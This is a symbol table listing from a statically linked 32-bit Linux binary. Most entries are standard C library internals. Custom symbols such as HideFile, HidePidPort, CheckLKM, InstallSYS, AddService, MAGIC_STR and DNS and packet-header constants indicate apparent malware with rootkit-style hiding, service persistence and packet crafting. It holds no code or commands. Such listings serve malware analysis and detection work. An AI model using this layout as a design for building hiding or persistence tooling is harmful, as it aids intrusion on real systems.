.L258			.symtab	0x80ae76c	0	NOTYPE	<unknown>	DEFAULT	3
.L259			.symtab	0x80ae4a0	0	NOTYPE	<unknown>	DEFAULT	3
.L260			.symtab	0x80ae5f7	0	NOTYPE	<unknown>	DEFAULT	3
.L261			.symtab	0x80ae7c0	0	NOTYPE	<unknown>	DEFAULT	3
.L262			.symtab	0x80ae5e9	0	NOTYPE	<unknown>	DEFAULT	3
.L264			.symtab	0x80ae43d	0	NOTYPE	<unknown>	DEFAULT	3
.L266			.symtab	0x80ae496	0	NOTYPE	<unknown>	DEFAULT	3
.L267			.symtab	0x80ae68f	0	NOTYPE	<unknown>	DEFAULT	3
.L268			.symtab	0x80ae6a0	0	NOTYPE	<unknown>	DEFAULT	3
.L269			.symtab	0x80ae605	0	NOTYPE	<unknown>	DEFAULT	3
.L270			.symtab	0x80ae628	0	NOTYPE	<unknown>	DEFAULT	3
.L271			.symtab	0x80ae642	0	NOTYPE	<unknown>	DEFAULT	3
.L272			.symtab	0x80ae664	0	NOTYPE	<unknown>	DEFAULT	3
.L273			.symtab	0x80ae4ab	0	NOTYPE	<unknown>	DEFAULT	3
.L274			.symtab	0x80ae4e4	0	NOTYPE	<unknown>	DEFAULT	3
.L275			.symtab	0x80ae599	0	NOTYPE	<unknown>	DEFAULT	3
.L276			.symtab	0x80ae55f	0	NOTYPE	<unknown>	DEFAULT	3
.L277			.symtab	0x80ae5da	0	NOTYPE	<unknown>	DEFAULT	3
.L278			.symtab	0x80ae835	0	NOTYPE	<unknown>	DEFAULT	3
.L279			.symtab	0x80ae7ce	0	NOTYPE	<unknown>	DEFAULT	3
.L280			.symtab	0x80ae7e0	0	NOTYPE	<unknown>	DEFAULT	3
.L281			.symtab	0x80ae6b7	0	NOTYPE	<unknown>	DEFAULT	3
.L282			.symtab	0x80ae70c	0	NOTYPE	<unknown>	DEFAULT	3
.L283			.symtab	0x80ae467	0	NOTYPE	<unknown>	DEFAULT	3
.L350			.symtab	0x80ae840	0	NOTYPE	<unknown>	DEFAULT	3
.L351			.symtab	0x80ae84a	0	NOTYPE	<unknown>	DEFAULT	3
.L352			.symtab	0x80ae859	0	NOTYPE	<unknown>	DEFAULT	3
.L353			.symtab	0x80ae863	0	NOTYPE	<unknown>	DEFAULT	3
.L354			.symtab	0x80ae872	0	NOTYPE	<unknown>	DEFAULT	3
.L355			.symtab	0x80ae87d	0	NOTYPE	<unknown>	DEFAULT	3
.L356			.symtab	0x80ae887	0	NOTYPE	<unknown>	DEFAULT	3
.L357			.symtab	0x80ae892	0	NOTYPE	<unknown>	DEFAULT	3
.L358			.symtab	0x80ae89e	0	NOTYPE	<unknown>	DEFAULT	3
.L359			.symtab	0x80ae8aa	0	NOTYPE	<unknown>	DEFAULT	3
.L360			.symtab	0x80ae8b3	0	NOTYPE	<unknown>	DEFAULT	3
.L361			.symtab	0x80ae8bd	0	NOTYPE	<unknown>	DEFAULT	3
.L362			.symtab	0x80ae8cc	0	NOTYPE	<unknown>	DEFAULT	3
.L363			.symtab	0x80ae8db	0	NOTYPE	<unknown>	DEFAULT	3
.L364			.symtab	0x80ae8ea	0	NOTYPE	<unknown>	DEFAULT	3
.L365			.symtab	0x80ae8f9	0	NOTYPE	<unknown>	DEFAULT	3
.L366			.symtab	0x80ae908	0	NOTYPE	<unknown>	DEFAULT	3
.L380			.symtab	0x80ae438	0	NOTYPE	<unknown>	DEFAULT	3
.L411			.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L412			.symtab	0x80aeae6	0	NOTYPE	<unknown>	DEFAULT	3
.L413			.symtab	0x80aeb54	0	NOTYPE	<unknown>	DEFAULT	3
.L414			.symtab	0x80aebc0	0	NOTYPE	<unknown>	DEFAULT	3
.L415			.symtab	0x80aec20	0	NOTYPE	<unknown>	DEFAULT	3
.L416			.symtab	0x80aec60	0	NOTYPE	<unknown>	DEFAULT	3
.L61			.symtab	0x80ad673	0	NOTYPE	<unknown>	DEFAULT	3
.L63			.symtab	0x80ad6ef	0	NOTYPE	<unknown>	DEFAULT	3
.L64			.symtab	0x80ad6ce	0	NOTYPE	<unknown>	DEFAULT	3
.L67			.symtab	0x80ad6de	0	NOTYPE	<unknown>	DEFAULT	3
.L68			.symtab	0x80ad6d6	0	NOTYPE	<unknown>	DEFAULT	3
.L69			.symtab	0x80ad6a2	0	NOTYPE	<unknown>	DEFAULT	3
.L70			.symtab	0x80ad6c2	0	NOTYPE	<unknown>	DEFAULT	3
.L74			.symtab	0x80afb63	0	NOTYPE	<unknown>	DEFAULT	3
.L76			.symtab	0x80afbdf	0	NOTYPE	<unknown>	DEFAULT	3
.L77			.symtab	0x80afbbe	0	NOTYPE	<unknown>	DEFAULT	3
.L80			.symtab	0x80afbce	0	NOTYPE	<unknown>	DEFAULT	3
.L81			.symtab	0x80afbc6	0	NOTYPE	<unknown>	DEFAULT	3
.L82			.symtab	0x80afb92	0	NOTYPE	<unknown>	DEFAULT	3
.L83			.symtab	0x80afbb2	0	NOTYPE	<unknown>	DEFAULT	3
AddService			.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32			.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc			.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc			.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc			.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM			.symtab	0x804a670	107	FUNC	<unknown>	DEFAULT	3
CreateDir			.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR			.symtab	0x80cf4cc	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2			.symtab	0x80cf4dc	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT			.symtab	0x80cf4ec	4	OBJECT	<unknown>	DEFAULT	21
DelService			.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid			.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo			.symtab	0x804e2ce	539	FUNC	<unknown>	DEFAULT	3
GetIndex			.symtab	0x804b418	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed			.symtab	0x804e5e1	243	FUNC	<unknown>	DEFAULT	3
GetMemStat			.symtab	0x804e1d9	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP			.symtab	0x804ef5d	375	FUNC	<unknown>	DEFAULT	3
HideFile			.symtab	0x804a74d	151	FUNC	<unknown>	DEFAULT	3
HidePidPort			.symtab	0x804a6db	114	FUNC	<unknown>	DEFAULT	3
InstallSYS			.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec			.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv			.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2			.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility			.symtab	0x80cfa0c	4	OBJECT	<unknown>	DEFAULT	21
LogFile			.symtab	0x80cfa08	4	OBJECT	<unknown>	DEFAULT	21
LogMask			.symtab	0x80cfa00	4	OBJECT	<unknown>	DEFAULT	21
LogStat			.symtab	0x80d5044	4	OBJECT	<unknown>	DEFAULT	22
LogTag			.symtab	0x80d5048	4	OBJECT	<unknown>	DEFAULT	22
LogType			.symtab	0x80cfa04	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR			.symtab	0x80d1f60	33	OBJECT	<unknown>	DEFAULT	22
MainList			.symtab	0x80d1fa0	264	OBJECT	<unknown>	DEFAULT	22
ReadWord			.symtab	0x804e150	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H			.symtab	0x80cf4a4	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T			.symtab	0x80cf4a8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H			.symtab	0x80cf498	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR			.symtab	0x80cf4ac	4	OBJECT	<unknown>	DEFAULT	21
SIZE_TCP_H			.symtab	0x80cf4a0	4	OBJECT	<unknown>	DEFAULT	21
SIZE_UDP_H			.symtab	0x80cf49c	4	OBJECT	<unknown>	DEFAULT	21
SYS_BUF			.symtab	0x80cfce0	1	OBJECT	<unknown>	DEFAULT	22
SyslogAddr			.symtab	0x80d5060	110	OBJECT	<unknown>	DEFAULT	22
THREAD_NUM			.symtab	0x80d6170	4	OBJECT	<unknown>	DEFAULT	22
_Exit			.symtab	0x8067a28	19	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_			.symtab	0x80cf16c	0	OBJECT	<unknown>	HIDDEN	20
_IO_2_1_stderr_			.symtab	0x80cf700	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdin_			.symtab	0x80cf5c0	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdout_			.symtab	0x80cf660	152	OBJECT	<unknown>	DEFAULT	21
_IO_adjust_column			.symtab	0x805c9b0	60	FUNC	<unknown>	DEFAULT	3
_IO_adjust_wcolumn			.symtab	0x8084770	63	FUNC	<unknown>	DEFAULT	3
_IO_cleanup			.symtab	0x805d310	409	FUNC	<unknown>	DEFAULT	3
_IO_default_doallocate			.symtab	0x805de10	143	FUNC	<unknown>	DEFAULT	3
_IO_default_finish			.symtab	0x805e310	525	FUNC	<unknown>	DEFAULT	3
_IO_default_imbue			.symtab	0x805cac0	5	FUNC	<unknown>	DEFAULT	3
_IO_default_pbackfail			.symtab	0x805d900	310	FUNC	<unknown>	DEFAULT	3
_IO_default_read			.symtab	0x805ca90	10	FUNC	<unknown>	DEFAULT	3
_IO_default_seek			.symtab	0x805ca70	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekoff			.symtab	0x805c900	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekpos			.symtab	0x805c810	59	FUNC	<unknown>	DEFAULT	3
_IO_default_setbuf			.symtab	0x805dd10	244	FUNC	<unknown>	DEFAULT	3
_IO_default_showmanyc			.symtab	0x805cab0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_stat			.symtab	0x805ca80	10	FUNC	<unknown>	DEFAULT	3
_IO_default_sync			.symtab	0x805c8f0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_uflow			.symtab	0x805c7b0	52	FUNC	<unknown>	DEFAULT	3
_IO_default_underflow			.symtab	0x805c7a0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_write			.symtab	0x805caa0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_xsgetn			.symtab	0x805e250	185	FUNC	<unknown>	DEFAULT	3
_IO_default_xsputn			.symtab	0x805cc80	225	FUNC	<unknown>	DEFAULT	3
_IO_do_write			.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_doallocbuf			.symtab	0x805dc80	133	FUNC	<unknown>	DEFAULT	3
_IO_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_feof			.symtab	0x80596d0	154	FUNC	<unknown>	DEFAULT	3
_IO_fgets			.symtab	0x8057ff0	360	FUNC	<unknown>	DEFAULT	3
_IO_file_attach			.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_file_close			.symtab	0x805a940	18	FUNC	<unknown>	DEFAULT	3
_IO_file_close_it			.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_file_close_mmap			.symtab	0x805a960	60	FUNC	<unknown>	DEFAULT	3
_IO_file_doallocate			.symtab	0x80839b0	275	FUNC	<unknown>	DEFAULT	3
_IO_file_finish			.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_file_fopen			.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_file_init			.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_file_jumps			.symtab	0x80b3e00	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_maybe_mmap			.symtab	0x80b3ec0	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_mmap			.symtab	0x80b3e60	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_open			.symtab	0x805af30	263	FUNC	<unknown>	DEFAULT	3
_IO_file_overflow			.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_file_read			.symtab	0x805a9d0	48	FUNC	<unknown>	DEFAULT	3
_IO_file_seek			.symtab	0x8059fd0	18	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff			.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_maybe_mmap			.symtab	0x8059f80	80	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_mmap			.symtab	0x8059e50	297	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf			.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf_mmap			.symtab	0x805b270	115	FUNC	<unknown>	DEFAULT	3
_IO_file_stat			.symtab	0x805a9a0	37	FUNC	<unknown>	DEFAULT	3
_IO_file_sync			.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_file_sync_mmap			.symtab	0x8059ff0	165	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow			.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_maybe_mmap			.symtab	0x805a2e0	30	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_mmap			.symtab	0x805a6b0	66	FUNC	<unknown>	DEFAULT	3
_IO_file_write			.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn			.symtab	0x805a700	394	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_maybe_mmap			.symtab	0x805a290	67	FUNC	<unknown>	DEFAULT	3
_IO_file_xsgetn_mmap			.symtab	0x805a5b0	242	FUNC	<unknown>	DEFAULT	3
_IO_file_xsputn			.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_flush_all			.symtab	0x805d4b0	20	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_linebuffered			.symtab	0x805cf30	448	FUNC	<unknown>	DEFAULT	3
_IO_flush_all_lockp			.symtab	0x805d0f0	533	FUNC	<unknown>	DEFAULT	3
_IO_fopen			.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_fprintf			.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
_IO_free_backup_area			.symtab	0x805cc20	93	FUNC	<unknown>	DEFAULT	3
_IO_free_wbackup_area			.symtab	0x80847f0	104	FUNC	<unknown>	DEFAULT	3
_IO_ftell			.symtab	0x8083ad0	436	FUNC	<unknown>	DEFAULT	3
_IO_funlockfile			.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
_IO_fwide			.symtab	0x8085950	323	FUNC	<unknown>	DEFAULT	3
_IO_fwrite			.symtab	0x8083d60	297	FUNC	<unknown>	DEFAULT	3
_IO_getc			.symtab	0x8059880	207	FUNC	<unknown>	DEFAULT	3
_IO_getdelim			.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
_IO_getline			.symtab	0x8058440	55	FUNC	<unknown>	DEFAULT	3
_IO_getline_info			.symtab	0x80582d0	353	FUNC	<unknown>	DEFAULT	3
_IO_helper_jumps			.symtab	0x80c2a40	84	OBJECT	<unknown>	DEFAULT	7
_IO_helper_overflow			.symtab	0x8079fc0	175	FUNC	<unknown>	DEFAULT	3
_IO_init			.symtab	0x805db50	163	FUNC	<unknown>	DEFAULT	3
_IO_init_marker			.symtab	0x805dea0	169	FUNC	<unknown>	DEFAULT	3
_IO_init_wmarker			.symtab	0x80850e0	193	FUNC	<unknown>	DEFAULT	3
_IO_iter_begin			.symtab	0x805cad0	10	FUNC	<unknown>	DEFAULT	3
_IO_iter_end			.symtab	0x805cae0	7	FUNC	<unknown>	DEFAULT	3
_IO_iter_file			.symtab	0x805cb00	8	FUNC	<unknown>	DEFAULT	3
_IO_iter_next			.symtab	0x805caf0	11	FUNC	<unknown>	DEFAULT	3
_IO_least_marker			.symtab	0x805c690	38	FUNC	<unknown>	DEFAULT	3
_IO_least_wmarker			.symtab	0x8084570	51	FUNC	<unknown>	DEFAULT	3
_IO_link_in			.symtab	0x805d4d0	400	FUNC	<unknown>	DEFAULT	3
_IO_list_all			.symtab	0x80cf798	4	OBJECT	<unknown>	DEFAULT	21
_IO_list_all_stamp			.symtab	0x80d4b00	4	OBJECT	<unknown>	DEFAULT	22
_IO_list_lock			.symtab	0x805cb10	64	FUNC	<unknown>	DEFAULT	3
_IO_list_resetlock			.symtab	0x805cb90	35	FUNC	<unknown>	DEFAULT	3
_IO_list_unlock			.symtab	0x805cb50	56	FUNC	<unknown>	DEFAULT	3
_IO_marker_delta			.symtab	0x805ca40	47	FUNC	<unknown>	DEFAULT	3
_IO_marker_difference			.symtab	0x805ca20	17	FUNC	<unknown>	DEFAULT	3
_IO_mem_finish			.symtab	0x8085bb0	106	FUNC	<unknown>	DEFAULT	3
_IO_mem_jumps			.symtab	0x80c2ea0	84	OBJECT	<unknown>	DEFAULT	7
_IO_mem_sync			.symtab	0x8085b60	76	FUNC	<unknown>	DEFAULT	3
_IO_new_do_write			.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_new_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_new_file_attach			.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_new_file_close_it			.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_new_file_finish			.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_new_file_fopen			.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_new_file_init			.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_new_file_overflow			.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_new_file_seekoff			.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_new_file_setbuf			.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_new_file_sync			.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_new_file_underflow			.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_new_file_write			.symtab	0x805a890	166	FUNC	<unknown>	DEFAULT	3
_IO_new_file_xsputn			.symtab	0x805bab0	705	FUNC	<unknown>	DEFAULT	3
_IO_new_fopen			.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
_IO_no_init			.symtab	0x805da40	259	FUNC	<unknown>	DEFAULT	3
_IO_old_init			.symtab	0x805c850	150	FUNC	<unknown>	DEFAULT	3
_IO_padn			.symtab	0x8084150	203	FUNC	<unknown>	DEFAULT	3
_IO_remove_marker			.symtab	0x805c9f0	40	FUNC	<unknown>	DEFAULT	3
_IO_seekmark			.symtab	0x805d840	179	FUNC	<unknown>	DEFAULT	3
_IO_seekoff			.symtab	0x8084300	233	FUNC	<unknown>	DEFAULT	3
_IO_seekoff_unlocked			.symtab	0x8084220	224	FUNC	<unknown>	DEFAULT	3
_IO_seekwmark			.symtab	0x8084d40	181	FUNC	<unknown>	DEFAULT	3
_IO_setb			.symtab	0x805cbc0	93	FUNC	<unknown>	DEFAULT	3
_IO_sgetn			.symtab	0x805c7f0	18	FUNC	<unknown>	DEFAULT	3
_IO_sputbackc			.symtab	0x805c910	75	FUNC	<unknown>	DEFAULT	3
_IO_sputbackwc			.symtab	0x80846d0	73	FUNC	<unknown>	DEFAULT	3
_IO_sscanf			.symtab	0x8083390	36	FUNC	<unknown>	DEFAULT	3
_IO_stderr			.symtab	0x80cf9e4	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdfile_0_lock			.symtab	0x80d4b10	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_1_lock			.symtab	0x80d4b1c	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdfile_2_lock			.symtab	0x80d4b28	12	OBJECT	<unknown>	DEFAULT	22
_IO_stdin			.symtab	0x80cf9dc	4	OBJECT	<unknown>	HIDDEN	21
_IO_stdin_used			.symtab	0x80b2b04	4	OBJECT	<unknown>	DEFAULT	7
_IO_stdout			.symtab	0x80cf9e0	4	OBJECT	<unknown>	HIDDEN	21
_IO_str_count			.symtab	0x805e6d0	23	FUNC	<unknown>	DEFAULT	3
_IO_str_finish			.symtab	0x805e6f0	60	FUNC	<unknown>	DEFAULT	3
_IO_str_init_readonly			.symtab	0x805ecc0	132	FUNC	<unknown>	DEFAULT	3
_IO_str_init_static			.symtab	0x805ed50	155	FUNC	<unknown>	DEFAULT	3
_IO_str_init_static_internal			.symtab	0x805ea20	145	FUNC	<unknown>	DEFAULT	3
_IO_str_jumps			.symtab	0x80b3f20	84	OBJECT	<unknown>	DEFAULT	7
_IO_str_overflow			.symtab	0x805e8b0	359	FUNC	<unknown>	DEFAULT	3
_IO_str_pbackfail			.symtab	0x805e730	44	FUNC	<unknown>	DEFAULT	3
_IO_str_seekoff			.symtab	0x805eac0	510	FUNC	<unknown>	DEFAULT	3
_IO_str_underflow			.symtab	0x805e680	66	FUNC	<unknown>	DEFAULT	3
_IO_strn_jumps			.symtab	0x80b3d20	84	OBJECT	<unknown>	DEFAULT	7
_IO_strn_overflow			.symtab	0x8059970	99	FUNC	<unknown>	DEFAULT	3
_IO_sungetc			.symtab	0x805c960	70	FUNC	<unknown>	DEFAULT	3
_IO_sungetwc			.symtab	0x8084720	70	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_backup_area			.symtab	0x805c6f0	43	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_get_mode			.symtab	0x805c720	115	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_main_get_area			.symtab	0x805c6c0	41	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_main_wget_area			.symtab	0x80845b0	43	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_wbackup_area			.symtab	0x80845e0	45	FUNC	<unknown>	DEFAULT	3
_IO_switch_to_wget_mode			.symtab	0x8084650	121	FUNC	<unknown>	DEFAULT	3
_IO_un_link			.symtab	0x805d660	425	FUNC	<unknown>	DEFAULT	3
_IO_unsave_markers			.symtab	0x805dc00	114	FUNC	<unknown>	DEFAULT	3
_IO_unsave_wmarkers			.symtab	0x8085060	120	FUNC	<unknown>	DEFAULT	3
_IO_vasprintf			.symtab	0x80aa880	356	FUNC	<unknown>	DEFAULT	3
_IO_vdprintf			.symtab	0x8085c20	188	FUNC	<unknown>	DEFAULT	3
_IO_vfprintf			.symtab	0x807a350	20246	FUNC	<unknown>	DEFAULT	3
_IO_vfprintf_internal			.symtab	0x807a350	20246	FUNC	<unknown>	DEFAULT	3
_IO_vfscanf			.symtab	0x8098d80	22346	FUNC	<unknown>	DEFAULT	3
_IO_vfscanf_internal			.symtab	0x8098d80	22346	FUNC	<unknown>	DEFAULT	3
_IO_vsnprintf			.symtab	0x80599e0	213	FUNC	<unknown>	DEFAULT	3
_IO_vsscanf			.symtab	0x8084410	140	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_doallocate			.symtab	0x8084f20	151	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_finish			.symtab	0x8084b30	130	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_pbackfail			.symtab	0x8084bc0	376	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_uflow			.symtab	0x8084610	52	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_xsgetn			.symtab	0x8085360	213	FUNC	<unknown>	DEFAULT	3
_IO_wdefault_xsputn			.symtab	0x8084e00	280	FUNC	<unknown>	DEFAULT	3
_IO_wdo_write			.symtab	0x8058c30	335	FUNC	<unknown>	DEFAULT	3
_IO_wdoallocbuf			.symtab	0x8084fc0	154	FUNC	<unknown>	DEFAULT	3
_IO_wfile_doallocate			.symtab	0x8083cb0	169	FUNC	<unknown>	DEFAULT	3
_IO_wfile_jumps			.symtab	0x80b3c00	84	OBJECT	<unknown>	DEFAULT	7
_IO_wfile_jumps_maybe_mmap			.symtab	0x80b3cc0	84	OBJECT	<unknown>	DEFAULT	7
_IO_wfile_jumps_mmap			.symtab	0x80b3c60	84	OBJECT	<unknown>	DEFAULT	7
_IO_wfile_overflow			.symtab	0x8059070	579	FUNC	<unknown>	DEFAULT	3
_IO_wfile_seekoff			.symtab	0x8058600	1578	FUNC	<unknown>	DEFAULT	3
_IO_wfile_sync			.symtab	0x8058f10	346	FUNC	<unknown>	DEFAULT	3
_IO_wfile_underflow			.symtab	0x80592c0	1000	FUNC	<unknown>	DEFAULT	3
_IO_wfile_underflow_maybe_mmap			.symtab	0x8058480	59	FUNC	<unknown>	DEFAULT	3
_IO_wfile_underflow_mmap			.symtab	0x80584c0	307	FUNC	<unknown>	DEFAULT	3
_IO_wfile_xsputn			.symtab	0x8058d80	393	FUNC	<unknown>	DEFAULT	3
_IO_wide_data_0			.symtab	0x80cf7a0	188	OBJECT	<unknown>	DEFAULT	21
_IO_wide_data_1			.symtab	0x80cf860	188	OBJECT	<unknown>	DEFAULT	21
_IO_wide_data_2			.symtab	0x80cf920	188	OBJECT	<unknown>	DEFAULT	21
_IO_wmarker_delta			.symtab	0x80847b0	61	FUNC	<unknown>	DEFAULT	3
_IO_wpadn			.symtab	0x80844a0	203	FUNC	<unknown>	DEFAULT	3
_IO_wsetb			.symtab	0x8084ac0	97	FUNC	<unknown>	DEFAULT	3
_Jv_RegisterClasses			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
_L_lock_102			.symtab	0x8057fb3	16	FUNC	<unknown>	DEFAULT	3
_L_lock_106			.symtab	0x806b205	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1091			.symtab	0x8052a9d	12	FUNC	<unknown>	DEFAULT	3
_L_lock_10969			.symtab	0x8065bd5	16	FUNC	<unknown>	DEFAULT	3
_L_lock_11078			.symtab	0x8065c01	12	FUNC	<unknown>	DEFAULT	3
_L_lock_11265			.symtab	0x8065c19	16	FUNC	<unknown>	DEFAULT	3
_L_lock_11360			.symtab	0x8065c45	12	FUNC	<unknown>	DEFAULT	3
_L_lock_116			.symtab	0x8055926	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1198			.symtab	0x806d9e4	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1206			.symtab	0x8052333	16	FUNC	<unknown>	DEFAULT	3
_L_lock_122			.symtab	0x805646e	16	FUNC	<unknown>	DEFAULT	3
_L_lock_122			.symtab	0x8057ab8	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1244			.symtab	0x8069c2c	16	FUNC	<unknown>	DEFAULT	3
_L_lock_12694			.symtab	0x8065c5d	16	FUNC	<unknown>	DEFAULT	3
_L_lock_12751			.symtab	0x8065c89	16	FUNC	<unknown>	DEFAULT	3
_L_lock_12843			.symtab	0x8065ca9	12	FUNC	<unknown>	DEFAULT	3
_L_lock_130			.symtab	0x8055e95	16	FUNC	<unknown>	DEFAULT	3
_L_lock_13011			.symtab	0x8065ccd	16	FUNC	<unknown>	DEFAULT	3
_L_lock_13091			.symtab	0x8065d09	12	FUNC	<unknown>	DEFAULT	3
_L_lock_13253			.symtab	0x8065d21	16	FUNC	<unknown>	DEFAULT	3
_L_lock_13355			.symtab	0x8065d4d	12	FUNC	<unknown>	DEFAULT	3
_L_lock_13521			.symtab	0x8065d59	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1358			.symtab	0x8065979	12	FUNC	<unknown>	DEFAULT	3
_L_lock_13706			.symtab	0x8065d79	16	FUNC	<unknown>	DEFAULT	3
_L_lock_13895			.symtab	0x8065d99	16	FUNC	<unknown>	DEFAULT	3
_L_lock_140			.symtab	0x8095019	16	FUNC	<unknown>	DEFAULT	3
_L_lock_14084			.symtab	0x8065db9	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1419			.symtab	0x8065985	16	FUNC	<unknown>	DEFAULT	3
_L_lock_14258			.symtab	0x8065dd9	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1449			.symtab	0x809646a	16	FUNC	<unknown>	DEFAULT	3
_L_lock_15157			.symtab	0x8065df9	16	FUNC	<unknown>	DEFAULT	3
_L_lock_15208			.symtab	0x8065e19	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1544			.symtab	0x80659a5	16	FUNC	<unknown>	DEFAULT	3
_L_lock_15489			.symtab	0x8065e39	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1596			.symtab	0x807f27e	12	FUNC	<unknown>	DEFAULT	3
_L_lock_16044			.symtab	0x8065e59	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1644			.symtab	0x80659d5	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1679			.symtab	0x80659e5	16	FUNC	<unknown>	DEFAULT	3
_L_lock_16810			.symtab	0x8065e79	12	FUNC	<unknown>	DEFAULT	3
_L_lock_1711			.symtab	0x805e559	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1711			.symtab	0x8065a05	12	FUNC	<unknown>	DEFAULT	3
_L_lock_1772			.symtab	0x805e569	12	FUNC	<unknown>	DEFAULT	3
_L_lock_180			.symtab	0x805648e	16	FUNC	<unknown>	DEFAULT	3
_L_lock_1860			.symtab	0x8065a11	12	FUNC	<unknown>	DEFAULT	3
_L_lock_188			.symtab	0x8076c15	16	FUNC	<unknown>	DEFAULT	3
_L_lock_19			.symtab	0x8055e75	16	FUNC	<unknown>	DEFAULT	3
_L_lock_193			.symtab	0x80843e9	12	FUNC	<unknown>	DEFAULT	3
_L_lock_1961			.symtab	0x805e591	16	FUNC	<unknown>	DEFAULT	3
